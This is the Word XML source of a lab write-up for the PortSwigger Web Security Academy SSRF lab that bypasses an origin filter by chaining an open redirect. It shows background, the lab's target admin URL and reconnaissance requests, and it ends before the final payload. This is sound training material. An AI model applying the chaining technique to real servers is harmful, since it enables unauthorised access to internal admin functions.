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A752F" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PortSwigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> Web Security Academy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050E51C3" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A5276"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>LAB WRITEUP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11635679" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>SSRF with Filter Bypass via Open Redirection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF90F03" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Server-Side Request </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Forgery  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Difficulty: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PRACTITIONER  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Status: SOLVED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC1C2A1" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="400"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Category: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SSRF  |</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="7F8C8D"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  Technique: Open Redirection Chaining</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37545A7A" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="BDC3C7"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A1FD8CE" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72CD328C" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5276"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>1. Lab Overview</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45190B49" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED088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D0889" w14:paraId="208A19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CD2D50C" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Lab Name</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F440BEB" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>SSRF with Filter Bypass via Open Redirection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="3417BF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CF5A9D8" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Platform</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781A806" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>PortSwigger</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> Web Security Academy</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="7B4173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E084903" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Category</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E5A6EB" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Server-Side Request Forgery (SSRF)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="498B6E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8F3A981" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Difficulty</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6BA70EF" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Practitioner</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="2D0DF5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50A7BF0" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Target</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E416007" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>http://192.168.0.12:8080/admin</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="1AAFD4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B8D9E23" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Objective</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F84D07" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Delete user '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>carlos'</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> via chained SSRF + Open Redirect</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00ED0889" w14:paraId="2392AB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68156A3" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>Defense</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AE58E59" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>stockApi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> restricted to same-origin / local application URLs only</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4CD2A54F" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481C9E04" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="BDC3C7"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE6E2E3" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="109AD35E" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5276"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2. Vulnerability Background</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAB79C5" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="336B2C05" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.1 SSRF — Recap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31849129" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Server-Side Request Forgery (SSRF) tricks a server into making outbound HTTP requests on behalf of the attacker. In this lab, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stockApi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> parameter directly controls where the server sends its request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C1A776" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31424457" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.2 The Defense: Origin Restriction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56449BB7" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Unlike the whitelist-filter labs, this application restricts the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stockApi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> parameter differently: it only allows requests to the local application itself (same host/origin). Attempting to set </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stockApi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to an arbitrary external URL or internal IP is blocked outright.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21169AB7" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B3A3325" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.3 Open Redirection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C91C63" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>An open redirection vulnerability exists when an application accepts a user-controlled value and uses it as the destination of an HTTP redirect (Location header), without validating whether that destination is safe. In this lab, the 'Next product' navigation feature does exactly this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7852C4DF" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="117A65"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /product/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="117A65"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nextProduct?path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="117A65"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="117A65"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product?productId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="117A65"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A57A716" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="117A65"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTP/1.1 302 Found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB1BC27" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="117A65"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Location: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="117A65"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product?productId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="117A65"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508BF0BE" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Since the path parameter is echoed directly into the Location header, an attacker can supply any URL — including internal IPs — as the redirect destination.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239F9B4B" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D153FCC" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>2.4 Why Chaining Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733D4DBF" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The stock checker is permitted to make requests to the local application (same origin). If the local </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>application</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> then redirects the request to an internal IP, the stock checker follows the redirect — bypassing the origin restriction entirely, because the initial request was 'allowed'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DC9406" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56275291" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="BDC3C7"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D975AD8" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7284E5F6" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A5276"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3. Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F76F1DF" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4129DA3E" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1 Discover the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>stockApi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA65B74" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Intercept the 'Check stock' POST request on any product page. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stockApi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> parameter is visible:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720F76A9" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="117A65"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stockApi=http%3A%2F%2F&lt;lab-host&gt;%2Fproduct%2Fstock%2Fcheck%3FproductId%3D1%26storeId%3D1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5648259B" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28D7A106" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>3.2 Confirm Direct SSRF is Blocked</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7349245D" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Try changing </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>stockApi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to an arbitrary host such as http://192.168.0.12:8080/. The application rejects this — the defense is in place.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58050509" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="539F10D8" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="2C3E50"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.3 Find the Open Redirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185621DC" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>Click 'Next product' in the browser. Intercept the request and observe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5DC446" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="117A65"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GET /product/nextProduct?currentProductId=1&amp;path=/product?productId=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173F729F" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="117A65"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>HTTP/1.1 302 Found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781CF249" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="120"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="117A65"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Location: /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="117A65"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>product?productId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="117A65"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0987C106" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The path parameter is placed directly into the Location header. This is an unvalidated open redirect. Replacing the value with an </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>absolute URL redirects</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to any host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3804C93D" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AA8FCA2" w14:textId="77777777" w:rsidR="00ED0889" w:rsidRDefault="00ED0889">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="BDC3C7"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
    </w:p>
